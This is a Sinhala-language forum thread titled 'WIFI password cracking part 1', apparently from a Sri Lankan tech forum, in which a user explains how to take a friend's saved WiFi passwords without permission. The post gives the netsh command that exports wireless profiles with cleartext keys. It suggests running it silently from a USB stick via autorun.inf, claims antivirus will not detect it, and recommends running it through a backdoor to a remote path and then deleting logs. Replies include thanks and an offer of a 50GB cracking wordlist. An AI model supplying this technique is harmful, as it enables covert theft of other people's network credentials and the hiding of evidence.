WIFI Password_අදිමු

owlX

Well-known member
  • Jul 13, 2014
    1,321
    400
    83
    /usr/bin
    WIFI password cracking part - 1

    කාලෙකින් නූලක් දාන්නේ. :D wifi password crack කරගන්න විදියක් තමා කියන්‍න යන්නේ. මේ part 1 තව 4ක් 5ක් ගියාම සිරා විදියටම crack කරන හැටි කියලා දෙන්නම්.. මේ ගැන වැඩි විස්තර K_ZONE සහෝදරයා දාල තිබ්බා බලන්න.

    part 1 හිංදා පොඩි සීන් එකක්. මේකෙදී කරන්නේ අදුරන කාගෙ හරි Lap එකින් password එක ගන්න එක..

    උදා :
    යාළුවෙක් ඉන්නවා උෟ pass දෙන්නේ නෑ. ඒත් උගේ ලැප් එක use කරන්න පුළුවං Guest උනත් අව්ලක් නෑ. උගේ Lap එකට පෙන් එක ගහලා යට තියෙන attachment එක රන් කරන්න එතකොට pen ඒකේ .XML ඇති SSID name එකෙන්. ඒක notepad එකෙන් open කරන්න එ‍්කේ <keyMaterial> කියන තැන ඇති password එක. ඕන්නම් autorun.inf වලට දාන්න එතකොට pen එක ගැහුව ගමන් බඩු ඇතුලේ.. මේක Malware එකක් නෙමේ virus guard වලින් අල්ලන්නේ නෑ :angry::angry:


    Technical details :

    PHP:
    netsh wlan export profile interface=wi-fi key=clear

    බැක්-ඩෝර් එකක command එකක් විදියට execute කරන්නත් පුළුවං :) එතොකොට මතක ඇතුව path එකක් use කරන්න. Logs මකන්න නැත්තම් ඉතිං වෙන දේ කියන්න ඕන නෑනේ :D

    PHP:
     netsh wlan export profile interface=wi-fi key=clear  folder="%temp% or you RHOST path"

    අද එකනම් ලොකු ප්‍රයෝජනයක් වෙන එකක් නෑ.. ඒත් පලවෙනි එක හිංදා දැම්මේ.

     

    Attachments

    • defult.zip
      20 KB · Views: 567
    Last edited:

    මම බෙනා

    Well-known member
  • Sep 8, 2012
    5,428
    970
    113
    ලංකාවේ
    :)

    එල මචන්... ඊලඟ එකත් ඉක්මන්ටම දාන්ඩ...අපිට මේ පැත්තේ එන්ඩ බැරි උනොත් 2 ත්‍රේඩ් එක දාලා visitor message එකක් දාන්ඩෝ... :(

    රෙප් රෙප් :D :yes:
     
    Last edited:

    owlX

    Well-known member
  • Jul 13, 2014
    1,321
    400
    83
    /usr/bin
    නියම වැඩක් මචන් කරලා බලමු මගේ ලැප් ඒකටම
    රේප්++


    මම බෙනා;18297681 said:
    :)

    එල මචන්... ඊලඟ එකත් ඉක්මන්ටම දාන්ඩ...අපිට මේ පැත්තේ එන්ඩ බැරි උනොත් 2 ත්‍රේඩ් එක දාලා visitor message එකක් දාන්ඩෝ... :(

    රෙප් රෙප් :D :yes:

    තැන්කිව් මචංලා.. එල බං අනිවා දාන්නම් :) ;)
     

    owlX

    Well-known member
  • Jul 13, 2014
    1,321
    400
    83
    /usr/bin
    hari giye nahane machan
    මොකද්ද මචං OS එක උඹ file එක Run කරේ Download folder එකේ නම් ඒ folder eke WIFI............. .XML කියලා file ඇති බලහං.
    උදා WIFI ZTE 1.xml වගේ
     

    owlX

    Well-known member
  • Jul 13, 2014
    1,321
    400
    83
    /usr/bin

    wingman

    Well-known member
  • Oct 3, 2009
    7,691
    2,741
    113
    In this moment
    Metasploit?
    wifi crack කරේ පොඩි කලේ බන්.. 50GB word list එකක් තියනවා ඕනි නම් කියපන්.. :P
     
    Last edited: